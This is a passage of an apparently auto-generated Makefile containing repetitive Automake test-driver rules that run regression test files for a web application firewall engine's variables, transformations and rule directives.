$(AM_TESTS_FD_REDIRECT) test/test-cases/regression/sec_component_signature.json.log: test/test-cases/regression/sec_component_signature.json @p='test/test-cases/regression/sec_component_signature.json'; \ b='test/test-cases/regression/sec_component_signature.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/secmarker.json.log: test/test-cases/regression/secmarker.json @p='test/test-cases/regression/secmarker.json'; \ b='test/test-cases/regression/secmarker.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/secruleengine.json.log: test/test-cases/regression/secruleengine.json @p='test/test-cases/regression/secruleengine.json'; \ b='test/test-cases/regression/secruleengine.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/transformation-none.json.log: test/test-cases/regression/transformation-none.json @p='test/test-cases/regression/transformation-none.json'; \ b='test/test-cases/regression/transformation-none.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/transformations.json.log: test/test-cases/regression/transformations.json @p='test/test-cases/regression/transformations.json'; \ b='test/test-cases/regression/transformations.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json.log: test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json @p='test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json'; \ b='test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_GET.json.log: test/test-cases/regression/variable-ARGS_GET.json @p='test/test-cases/regression/variable-ARGS_GET.json'; \ b='test/test-cases/regression/variable-ARGS_GET.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_GET_NAMES.json.log: test/test-cases/regression/variable-ARGS_GET_NAMES.json @p='test/test-cases/regression/variable-ARGS_GET_NAMES.json'; \ b='test/test-cases/regression/variable-ARGS_GET_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS.json.log: test/test-cases/regression/variable-ARGS.json @p='test/test-cases/regression/variable-ARGS.json'; \ b='test/test-cases/regression/variable-ARGS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_NAMES.json.log: test/test-cases/regression/variable-ARGS_NAMES.json @p='test/test-cases/regression/variable-ARGS_NAMES.json'; \ b='test/test-cases/regression/variable-ARGS_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_POST.json.log: test/test-cases/regression/variable-ARGS_POST.json @p='test/test-cases/regression/variable-ARGS_POST.json'; \ b='test/test-cases/regression/variable-ARGS_POST.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ARGS_POST_NAMES.json.log: test/test-cases/regression/variable-ARGS_POST_NAMES.json @p='test/test-cases/regression/variable-ARGS_POST_NAMES.json'; \ b='test/test-cases/regression/variable-ARGS_POST_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-AUTH_TYPE.json.log: test/test-cases/regression/variable-AUTH_TYPE.json @p='test/test-cases/regression/variable-AUTH_TYPE.json'; \ b='test/test-cases/regression/variable-AUTH_TYPE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-DURATION.json.log: test/test-cases/regression/variable-DURATION.json @p='test/test-cases/regression/variable-DURATION.json'; \ b='test/test-cases/regression/variable-DURATION.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-ENV.json.log: test/test-cases/regression/variable-ENV.json @p='test/test-cases/regression/variable-ENV.json'; \ b='test/test-cases/regression/variable-ENV.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FILES_COMBINED_SIZE.json.log: test/test-cases/regression/variable-FILES_COMBINED_SIZE.json @p='test/test-cases/regression/variable-FILES_COMBINED_SIZE.json'; \ b='test/test-cases/regression/variable-FILES_COMBINED_SIZE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FILES.json.log: test/test-cases/regression/variable-FILES.json @p='test/test-cases/regression/variable-FILES.json'; \ b='test/test-cases/regression/variable-FILES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FILES_NAMES.json.log: test/test-cases/regression/variable-FILES_NAMES.json @p='test/test-cases/regression/variable-FILES_NAMES.json'; \ b='test/test-cases/regression/variable-FILES_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FILES_SIZES.json.log: test/test-cases/regression/variable-FILES_SIZES.json @p='test/test-cases/regression/variable-FILES_SIZES.json'; \ b='test/test-cases/regression/variable-FILES_SIZES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FULL_REQUEST.json.log: test/test-cases/regression/variable-FULL_REQUEST.json @p='test/test-cases/regression/variable-FULL_REQUEST.json'; \ b='test/test-cases/regression/variable-FULL_REQUEST.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json.log: test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json @p='test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json'; \ b='test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-GEO.json.log: test/test-cases/regression/variable-GEO.json @p='test/test-cases/regression/variable-GEO.json'; \ b='test/test-cases/regression/variable-GEO.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-HIGHEST_SEVERITY.json.log: test/test-cases/regression/variable-HIGHEST_SEVERITY.json @p='test/test-cases/regression/variable-HIGHEST_SEVERITY.json'; \ b='test/test-cases/regression/variable-HIGHEST_SEVERITY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-INBOUND_DATA_ERROR.json.log: test/test-cases/regression/variable-INBOUND_DATA_ERROR.json @p='test/test-cases/regression/variable-INBOUND_DATA_ERROR.json'; \ b='test/test-cases/regression/variable-INBOUND_DATA_ERROR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MATCHED_VAR.json.log: test/test-cases/regression/variable-MATCHED_VAR.json @p='test/test-cases/regression/variable-MATCHED_VAR.json'; \ b='test/test-cases/regression/variable-MATCHED_VAR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MATCHED_VAR_NAME.json.log: test/test-cases/regression/variable-MATCHED_VAR_NAME.json @p='test/test-cases/regression/variable-MATCHED_VAR_NAME.json'; \ b='test/test-cases/regression/variable-MATCHED_VAR_NAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MATCHED_VARS.json.log: test/test-cases/regression/variable-MATCHED_VARS.json @p='test/test-cases/regression/variable-MATCHED_VARS.json'; \ b='test/test-cases/regression/variable-MATCHED_VARS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MATCHED_VARS_NAMES.json.log: test/test-cases/regression/variable-MATCHED_VARS_NAMES.json @p='test/test-cases/regression/variable-MATCHED_VARS_NAMES.json'; \ b='test/test-cases/regression/variable-MATCHED_VARS_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MODSEC_BUILD.json.log: test/test-cases/regression/variable-MODSEC_BUILD.json @p='test/test-cases/regression/variable-MODSEC_BUILD.json'; \ b='test/test-cases/regression/variable-MODSEC_BUILD.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json.log: test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json @p='test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json'; \ b='test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_FILENAME.json.log: test/test-cases/regression/variable-MULTIPART_FILENAME.json @p='test/test-cases/regression/variable-MULTIPART_FILENAME.json'; \ b='test/test-cases/regression/variable-MULTIPART_FILENAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json.log: test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json @p='test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json'; \ b='test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_NAME.json.log: test/test-cases/regression/variable-MULTIPART_NAME.json @p='test/test-cases/regression/variable-MULTIPART_NAME.json'; \ b='test/test-cases/regression/variable-MULTIPART_NAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json.log: test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json @p='test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json'; \ b='test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json.log: test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json @p='test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json'; \ b='test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json.log: test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json @p='test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json'; \ b='test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-PATH_INFO.json.log: test/test-cases/regression/variable-PATH_INFO.json @p='test/test-cases/regression/variable-PATH_INFO.json'; \ b='test/test-cases/regression/variable-PATH_INFO.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-QUERY_STRING.json.log: test/test-cases/regression/variable-QUERY_STRING.json @p='test/test-cases/regression/variable-QUERY_STRING.json'; \ b='test/test-cases/regression/variable-QUERY_STRING.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REMOTE_ADDR.json.log: test/test-cases/regression/variable-REMOTE_ADDR.json @p='test/test-cases/regression/variable-REMOTE_ADDR.json'; \ b='test/test-cases/regression/variable-REMOTE_ADDR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REMOTE_HOST.json.log: test/test-cases/regression/variable-REMOTE_HOST.json @p='test/test-cases/regression/variable-REMOTE_HOST.json'; \ b='test/test-cases/regression/variable-REMOTE_HOST.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REMOTE_PORT.json.log: test/test-cases/regression/variable-REMOTE_PORT.json @p='test/test-cases/regression/variable-REMOTE_PORT.json'; \ b='test/test-cases/regression/variable-REMOTE_PORT.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REMOTE_USER.json.log: test/test-cases/regression/variable-REMOTE_USER.json @p='test/test-cases/regression/variable-REMOTE_USER.json'; \ b='test/test-cases/regression/variable-REMOTE_USER.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json.log: test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json @p='test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json'; \ b='test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQBODY_PROCESSOR.json.log: test/test-cases/regression/variable-REQBODY_PROCESSOR.json @p='test/test-cases/regression/variable-REQBODY_PROCESSOR.json'; \ b='test/test-cases/regression/variable-REQBODY_PROCESSOR.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_BASENAME.json.log: test/test-cases/regression/variable-REQUEST_BASENAME.json @p='test/test-cases/regression/variable-REQUEST_BASENAME.json'; \ b='test/test-cases/regression/variable-REQUEST_BASENAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_BODY.json.log: test/test-cases/regression/variable-REQUEST_BODY.json @p='test/test-cases/regression/variable-REQUEST_BODY.json'; \ b='test/test-cases/regression/variable-REQUEST_BODY.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json.log: test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json @p='test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json'; \ b='test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_COOKIES.json.log: test/test-cases/regression/variable-REQUEST_COOKIES.json @p='test/test-cases/regression/variable-REQUEST_COOKIES.json'; \ b='test/test-cases/regression/variable-REQUEST_COOKIES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json.log: test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json @p='test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json'; \ b='test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_FILENAME.json.log: test/test-cases/regression/variable-REQUEST_FILENAME.json @p='test/test-cases/regression/variable-REQUEST_FILENAME.json'; \ b='test/test-cases/regression/variable-REQUEST_FILENAME.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_HEADERS.json.log: test/test-cases/regression/variable-REQUEST_HEADERS.json @p='test/test-cases/regression/variable-REQUEST_HEADERS.json'; \ b='test/test-cases/regression/variable-REQUEST_HEADERS.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json.log: test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json @p='test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json'; \ b='test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_LINE.json.log: test/test-cases/regression/variable-REQUEST_LINE.json @p='test/test-cases/regression/variable-REQUEST_LINE.json'; \ b='test/test-cases/regression/variable-REQUEST_LINE.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_METHOD.json.log: test/test-cases/regression/variable-REQUEST_METHOD.json @p='test/test-cases/regression/variable-REQUEST_METHOD.json'; \ b='test/test-cases/regression/variable-REQUEST_METHOD.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_PROTOCOL.json.log: test/test-cases/regression/variable-REQUEST_PROTOCOL.json @p='test/test-cases/regression/variable-REQUEST_PROTOCOL.json'; \ b='test/test-cases/regression/variable-REQUEST_PROTOCOL.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_URI.json.log: test/test-cases/regression/variable-REQUEST_URI.json @p='test/test-cases/regression/variable-REQUEST_URI.json'; \ b='test/test-cases/regression/variable-REQUEST_URI.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/variable-REQUEST_URI_RAW.json.log: test/test-cases/regression/variable-REQUEST_URI_RAW.json @p='test/test-cases/regression/variable-REQUEST_URI_RAW.json'; \ b='test/test-cases/regression/variable-REQUEST_URI_RAW.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) 